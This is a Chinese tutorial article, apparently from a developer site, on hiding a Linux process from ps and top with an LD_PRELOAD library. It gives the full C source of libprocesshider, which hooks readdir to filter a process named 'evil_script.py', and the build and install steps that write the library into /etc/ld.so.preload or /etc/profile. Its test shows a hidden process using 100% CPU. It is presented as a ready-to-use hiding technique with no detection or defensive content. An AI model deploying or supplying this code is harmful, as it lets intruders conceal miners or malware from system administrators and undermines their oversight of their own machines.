脚本之家 服务器常用软件
快捷导航
您的位置:首页网站技巧服务器Linux → linux 隐藏进程

linux 下隐藏进程的一种方法及遇到的坑

 更新时间:2018年09月07日 10:26:09   作者:mysgk  
这篇文章主要介绍了linux 下隐藏进程的一种方法,主要实现思路就是利用 LD_PRELOAD 来实现系统函数的劫持,具体实现代码,需要的朋友可以参考下

前言

1.本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下载

2.思路就是利用 LD_PRELOAD 来实现系统函数的劫持

LD_PRELOAD是什么:

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

实现

1.下载程序编译

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2.移动文件到/usr/local/lib/目录下

mv libprocesshider.so /usr/local/lib/

3.把它加载到全局动态连接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

测试

1.我们运行evil_script.py

2.此时发现在top 与 ps 中都无法找到 evil_script.py

此时我们发现 cpu 100%,但是却找不到任何占用cpu高的程序

分析

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, buf, size);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if(fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  sscanf(tmp, "%d (%[^)]s", &unused, buf);
  return 1;
}
#define DECLARE_READDIR(dirent, readdir)                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;        \
struct dirent* readdir(DIR *dirp)                    \
{                                    \
  if(original_##readdir == NULL) {                  \
    original_##readdir = dlsym(RTLD_NEXT, "readdir");        \
    if(original_##readdir == NULL)                 \
    {                                \
      fprintf(stderr, "Error in dlsym: %s\n", dlerror());     \
    }                                \
  }                                  \
  struct dirent* dir;                         \
  while(1)                              \
  {                                  \
    dir = original_##readdir(dirp);                 \
    if(dir) {                            \
      char dir_name[256];                     \
      char process_name[256];                   \
      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&    \
        strcmp(dir_name, "/proc") == 0 &&            \
        get_process_name(dir->d_name, process_name) &&     \
        strcmp(process_name, process_to_filter) == 0) {     \
        continue;                        \
      }                              \
    }                                \
    break;                             \
  }                                  \
  return dir;                             \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1.程序定义了一个变量 process_to_filter 来控制不显示哪个进程名

2.重写readdir,

strcmp(process_name, process_to_filter) == 0)

当发现当前进程名称与 process_to_filter 相同时,继续循环.

遇到的坑

1.某些Linux中这个程序编译通不过

解决方法

删除最后两行中的一行

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2.某些Linux中使用

shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
并不会生效
 此时我们需要配置环境变量
shell bmfxgkpt-yhd:~# vi /etc/profile
增加一行
shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

总结

以上所述是小编给大家介绍的linux 下隐藏进程的一种方法及遇到的坑,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!

您可能感兴趣的文章:

相关文章

  • 详解linux下查看系统版本号信息的方法(总结)

    详解linux下查看系统版本号信息的方法(总结)

    本篇文章主要介绍了详解CentOS下查看系统版本号信息的方法(总结),具有一定的参考价值,有兴趣的可以来了解一下
    2017-07-07
  • 清除minerd进程的简单方法

    清除minerd进程的简单方法

    下面小编就为大家带来一篇清除minerd进程的简单方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2016-12-12
  • Linux内核参数调整方法

    Linux内核参数调整方法

    由于Linux的内核参数信息都存在内存中,因此可以通过命令直接修改,并且修改后直接生效。但是,当系统重新启动后,原来设置的参数值就会丢失,而系统每次启动时都会自动去/etc/sysctl.conf文件中读取内核参数,因此将内核的参数配置写入这个文件中,是一个比较好的选择。
    2017-11-11
  • Linux(CentOS)环境下安装下载Nginx并配置

    Linux(CentOS)环境下安装下载Nginx并配置

    本篇文章主要介绍了Linux(CentOS)环境下安装下载Nginx并配置 ,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2017-02-02
  • Linux+Nginx+Php架设高性能WEB服务器

    Linux+Nginx+Php架设高性能WEB服务器

    来自wiki.nginx.org的关于Nginx的介绍
    2009-05-05
  • 如何利用多核CPU来加速你的Linux命令(GNU Parallel)

    如何利用多核CPU来加速你的Linux命令(GNU Parallel)

    这篇文章主要介绍了如何利用多核CPU来加速你的Linux命令(GNU Parallel),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2019-01-01
  • 详解Linux索引节点inode

    详解Linux索引节点inode

    这篇文章主要介绍了Linux索引节点inode的相关资料,帮助大家更好的理解和学习Linux,感兴趣的朋友可以了解下
    2020-08-08
  • ubuntu 16.04下不能启动Steam的解决方法

    ubuntu 16.04下不能启动Steam的解决方法

    这篇文章主要给大家介绍了关于在ubuntu 16.04下不能启动Steam的解决方法,文中介绍的非常详细,对大家具有一定的参考学习价值,需要的朋友们下面来一起看看吧。
    2017-06-06
  • 使用 libevent 和 libev 提高网络应用性能的方法

    使用 libevent 和 libev 提高网络应用性能的方法

    构建现代的服务器应用程序需要以某种方法同时接收数百、数千甚至数万个事件,无论它们是内部请求还是网络连接,都要有效地处理它们的操作
    2011-05-05
  • Linux下乱码问题的解决方案小结

    Linux下乱码问题的解决方案小结

    linux系统中文件名内容为urf8编码, windows系统中文件名默认为gbk编码, 多数文档使用gbk编码,系统采用utf8编码.这篇文章主要介绍了Linux下乱码问题的解决方案,需要的朋友可以参考下
    2016-10-10

最新评论